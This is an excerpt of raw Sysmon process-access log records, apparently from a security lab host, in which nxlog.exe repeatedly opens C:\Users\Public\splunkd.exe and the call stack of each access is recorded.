{"EventTime":"2020-08-01 06:52:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:36.469\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:36.469","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:37.470\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:37.470","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:38.471\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:38.471","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:39.472\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:39.472","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:40.473\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:40.473","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:41.473\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:41.473","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:42.474\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 